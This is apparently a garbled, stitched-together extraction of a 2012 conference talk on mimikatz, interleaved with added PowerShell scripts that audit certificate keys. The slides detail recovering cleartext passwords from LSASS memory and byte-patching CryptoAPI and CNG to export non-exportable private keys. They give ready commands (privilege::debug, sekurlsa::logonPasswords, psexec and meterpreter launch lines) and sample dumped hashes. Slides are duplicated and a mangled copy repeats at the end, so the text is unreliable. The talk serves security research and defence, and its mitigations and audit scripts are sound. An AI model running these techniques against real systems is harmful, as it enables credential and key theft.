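                    $exportable = ($rsa.Key.ExportPolicy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0
                } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    $api        = 'CAPI'
                    $provider   = $rsa.CspKeyContainerInfo.ProviderName
                    $unique     = $rsa.CspKeyContainerInfo.UniqueKeyContainerName
                    # Exportable mirrors the flag the CSP checks in its export routine.
                    $exportable = $rsa.CspKeyContainerInfo.Exportable
                }
            } catch {
                # Hardware CSP/KSP keys, or machine keys read without admin rights, land here.
                $api = 'inaccessible: ' + $_.Exception.Message
            }
            [pscustomobject]@{
                Store      = $path
                Subject    = $cert.Subject
                Thumbprint = $cert.Thumbprint
                Api        = $api
                Provider   = $provider
                Exportable = $exportable
                KeyFile    = $unique
            }
        }
    }
}

# Orphan check for the memo slide's point: deleting a certificate leaves its key behind.
# Software keys of the current user live in these two folders; a file no certificate in
# the user's My store references is a candidate for review and, once confirmed,
# removal with "certutil -user -delkey <container>".
function Get-OrphanedUserKeyFiles {
    $sid     = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    $capiDir = Join-Path $env:APPDATA "Microsoft\Crypto\RSA\$sid"   # rsaenh CSP containers
    $cngDir  = Join-Path $env:APPDATA 'Microsoft\Crypto\Keys'        # Software KSP containers

    $referenced = @(Get-CertificatePrivateKeyAudit -StorePaths 'Cert:\CurrentUser\My' |
                    ForEach-Object { $_.KeyFile } | Where-Object { $_ })

    Get-ChildItem -Path $capiDir, $cngDir -File -ErrorAction SilentlyContinue |
        Where-Object { $referenced -notcontains $_.Name } |
        Select-Object FullName, Length, LastWriteTime
}

# Exportable software keys are the ones an attacker with code execution in the user's
# context (CAPI) or in LSASS (CNG) can walk away with; list them first.
Get-CertificatePrivateKeyAudit |
    Sort-Object Exportable -Descending |
    Format-Table Store, Subject, Api, Provider, Exportable -AutoSize

Write-Host 'Key files not referenced by a certificate in the user My store:'
Get-OrphanedUserKeyFiles | Format-Table -AutoSize
```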
mimikatz / what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz / that's all folks
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account.
After credential protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

Call stacks that reach the protection routine (innermost frame first):
lsasrv!LsaProtectMemory <- kerberos!KerbHideKey <- kerberos!KerbCreatePrimaryCredentials <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials (Kerberos ticket part? Maybe ;))
lsasrv!LsaProtectMemory <- kerberos!KerbHidePassword <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials (Kerberos part for password)
lsasrv!LsaProtectMemory <- msv1_0!NlpAddPrimaryCredential <- msv1_0!SspAcceptCredentials <- msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory <- wdigest!SpAcceptCredentials
lsasrv!LsaProtectMemory <- tspkg!TSHidePassword <- tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa - demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos - "hu?"
Ok. It works...
But why?
Not on all logons on NT5 (can need an unlock).
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol...
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical...
– For password auth:
  • password hash for shared secret, but keeping the password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
– NTLM hash on client...
– KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take advantage of its keys when we called it.
Can it be fun to decrypt outside the process? – Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too, and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
mimikatz :: sekurlsa - LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
[Diagram: the keys live in lsass (lsasrv) and are copied into mimikatz's own lsasrv: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8])]
mimikatz :: sekurlsa - LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
[Diagram: the keys live in lsass (lsasrv) and are copied into mimikatz: InitializationVector (BYTE[16]), h3DesKey and hAesKey (KIWI_BCRYPT_KEY handles, each pointing to a KIWI_BCRYPT_KEY_DATA)]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa - memo
Security Packages
Package         Symbols                                                  Type
tspkg           tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                                    LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList                            LIST_ENTRY
kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG

Protection Keys
Key    NT 5 Symbols
RC4    lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
DESx   lsasrv!g_pDESXKey / lsasrv!g_Feedback

Key    NT 6 Symbols
       lsasrv!InitializationVector
3DES   lsasrv!h3DesKey
AES    lsasrv!hAesKey
mimikatz :: sekurlsa - memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
Authentification Id : 0;234870
Package d'authentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
    msv1_0 : Utilisateur : Gentil Kiwi / Domaine : vm-w8-rp-x / Hash LM : d0e9aee149655a6075e4540af1f22d3b / Hash NTLM : cc36cf7a8514893efccd332446158b1a
    kerberos : Utilisateur : Gentil Kiwi / Domaine : vm-w8-rp-x / Mot de passe : waza1234
    wdigest : Utilisateur : Gentil Kiwi / Domaine : vm-w8-rp-x / Mot de passe : waza1234
    tspkg : Utilisateur : Gentil Kiwi / Domaine : vm-w8-rp-x / Mot de passe : waza1234
    livessp : n.t. (LUID KO)
mimikatz :: sekurlsa - what we can do
Basics:
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights, system rights, debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Take opportunities to stop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto - what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto - how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
  (constraint for most users; unavailable for computer keys)
– Export/Archive flag not present
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi - how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz :: crypto :: capi - how it's exported (… level)
[Diagram: inside the process, CryptoAPI and the RSA CSP: Load Private Key -> DPAPI Decode -> Ask to export Key -> Exportable? yes: Exported Key; no: NTE_BAD_KEY_STATE. Label: PLAYSKOOL]
mimikatz :: crypto :: patchcapi - because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié
Exportable?
mimikatz :: crypto :: patchcapi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi - demo time
Import, export, import as not exportable... export!
mimikatz :: crypto :: patchcapi - limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve a little...
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng - how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with Common Criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (KeyIso) functions.
It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz :: crypto :: cng - how it's exported (… level)
[Diagram: the process (CNG) talks over RPC to the KeyIso service, which runs inside the LSASS process: Load Private Key -> DPAPI Decode -> Ask to export Key -> Exportable? yes: Exported Key; no: NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP). Label: PLAYSKOOL]
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey::PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge
Exportable?
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng - demo time
Import, export, import as not exportable... export again!
mimikatz :: crypto :: patchcng - limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
– certutil can...
mimikatz :: crypto :: patchcng - bonus
After one admin patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto - memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto - what we can do
Exactly the same as for sekurlsa: what will prevent access to accounts/computer is – no admin, no admin, no admin...
Basics:
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
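Added example, not from the slides, serving both the "how it's protected" slide and this one: a PowerShell audit of the certificates with private keys in the user and machine "My" stores, reporting which provider holds each key and whether the key is flagged exportable, so the keys that only a software CSP/KSP protects (the providers the patchcapi and patchcng slides list) stand out from those on a smart card, HSM or TPM. The provider names come from the slides; the .NET APIs used are standard (RSACertificateExtensions needs .NET Framework 4.6 or later).

```powershell
# Added example, not from the slides: audit the certificates with private keys in the
# current user's and the machine's "My" stores and report which provider holds each key
# and whether it is flagged exportable. The talk shows that flag is enforced by code an
# admin (or, for CryptoAPI, the process owner) can patch: rsaenh!CPExportKey in-process,
# ncrypt!SPCryptExportKey inside LSASS. So for the software providers below the flag is
# not a boundary; only keys in a smart card, HSM or TPM provider are out of that reach.
# Needs .NET Framework 4.6+ (RSACertificateExtensions); run elevated to read machine keys.

# Software providers the talk names as targets of crypto::patchcapi and crypto::patchcng.
$SoftwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-PrivateKeyExposure {
    param([string[]] $StorePaths = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    foreach ($path in $StorePaths) {
        foreach ($cert in (Get-ChildItem -Path $path | Where-Object { $_.HasPrivateKey })) {
            $api = $null; $provider = $null; $exportable = $null; $flagIsBoundary = $null
            try {
                # CNG (KSP) keys come back as RSACng, CryptoAPI (CSP) keys as
                # RSACryptoServiceProvider, non-RSA keys (e.g. ECC) as $null.
                $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                if ($rsa -is [System.Security.Cryptography.RSACng]) {
                    $api        = 'CNG'
                    $provider   = $rsa.Key.Provider.Provider
                    $exportable = ($rsa.Key.ExportPolicy -ne [System.Security.Cryptography.CngExportPolicies]::None)
                } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    $api        = 'CryptoAPI'
                    $provider   = $rsa.CspKeyContainerInfo.ProviderName
                    $exportable = $rsa.CspKeyContainerInfo.Exportable
                } else {
                    $api = 'non-RSA'
                }
                if ($rsa) { $rsa.Dispose() }
                # $false: the key sits in a software provider the talk patches, so "not
                # exportable" only holds against callers who cannot patch that code.
                if ($provider) { $flagIsBoundary = -not ($SoftwareProviders -contains $provider) }
            } catch {
                # Typically: machine key without elevation, or a smart card that is not inserted.
                $provider = "unreadable: $($_.Exception.Message)"
            }

            [pscustomobject]@{
                Store          = $path
                Subject        = $cert.Subject
                Thumbprint     = $cert.Thumbprint
                Api            = $api
                Provider       = $provider
                Exportable     = $exportable
                FlagIsBoundary = $flagIsBoundary
            }
        }
    }
}

Get-PrivateKeyExposure | Format-Table -AutoSize
```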
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM, AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– ...
...
mimikatz :: that's all folks
Thanks to / Merci à
– my girlfriend, for her support (her LSASS crashed a few times)
– Application Security Forum, for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community, for their ideas & challenges
  • nagual, newsoft, mubix, ...
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
